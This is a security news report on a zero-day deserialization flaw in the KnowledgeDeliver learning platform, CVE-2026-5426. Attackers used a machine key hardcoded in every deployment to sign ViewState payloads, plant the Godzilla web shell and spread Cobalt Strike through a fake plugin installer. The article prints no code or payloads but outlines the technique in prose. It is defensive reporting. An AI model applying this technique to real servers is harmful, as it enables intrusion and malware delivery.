Zero-day flaw in KnowledgeDeliver used to deploy web shells
▼ Summary
– Hackers exploited a zero-day deserialization vulnerability, CVE-2026-5426, in KnowledgeDeliver LMS to deploy the Godzilla web shell.
– The flaw is caused by a shared hardcoded machine key in the web.config file across all KnowledgeDeliver customer deployments.
– Attackers used the machine key to sign malicious ViewState payloads, achieving remote code execution on the server.
– Mandiant responded to an attack where the exploit injected a script that tricked users into downloading a fake installer, infecting machines with a Cobalt Strike backdoor.
– The threat actor modified an application JavaScript file to load a malicious script, prompting users to install a fake “security authentication plugin.”
A critical zero-day vulnerability in the KnowledgeDeliver learning management system (LMS) has been actively exploited by hackers to deploy the Godzilla web shell. The attack targets servers running the platform and leverages a dangerous deserialization flaw to gain full remote control.
The vulnerability, cataloged as CVE-2026-5426, is a deserialization issue exploitable without any authentication. The root cause lies in a shared, hardcoded machine key embedded in the web portal configuration file. This key is identical across all KnowledgeDeliver customer deployments, creating a universal attack vector.
Threat actors obtained this machine key and weaponized it in ViewState deserialization attacks. By signing malicious ViewState payloads with the stolen key, they achieved remote code execution at the operating system level, bypassing all standard security controls.
Mandiant responded to an incident involving a KnowledgeDeliver server in late 2025. The researchers determined that the flaw was initially exploited as a zero-day to inject a malicious script into the web platform. “KnowledgeDeliver installations deployed before Feb. 24, 2026 relied on a standardized web.config file provided by the vendor. This configuration file contained hardcoded machineKey values used by the ASP. NET framework to encrypt and sign data, including ViewState payloads,” Mandiant explained.
The injected script tricked users into downloading a fake installer. This installer then infected the machine with a Cobalt Strike beacon, effectively planting a persistent backdoor. “The payload was encrypted using a key that used the name of the compromised organization, which indicated that the threat actor prepared this payload specifically for the targeted organization,” Mandiant noted in a report today.
The final payload was the Godzilla web shell, also known as BlueBeam. This . NET-based, in-memory web shell has been observed in similar attacks by Microsoft in late 2024. In August 2024, researchers at cybersecurity firm ASEC also reported Godzilla being deployed in ViewState deserialization attacks targeting financial sector companies in ASP. NET environments.
Once inside, the threat actor executed commands to escalate their control over the web server’s file system. They modified an application JavaScript file to include code that prompted users to install a “security authentication plugin” and loaded a malicious script from a domain under the attacker’s control.
This incident is part of a broader trend. Over the past year, hackers have repeatedly exploited improperly secured machine keys in ViewState deserialization attacks. In March 2025, threat actors abused a hardcoded machine key to attack Gladinet CentreStack file-sharing servers. In July 2025, hackers compromised 85 Microsoft SharePoint servers after stealing the machine key to create signed malicious ViewState payloads. State-sponsored actors have also used these attacks to deploy the WeepSteel reconnaissance tool on Sitecore servers that exposed their ASP. NET machine key.
(Source: BleepingComputer)
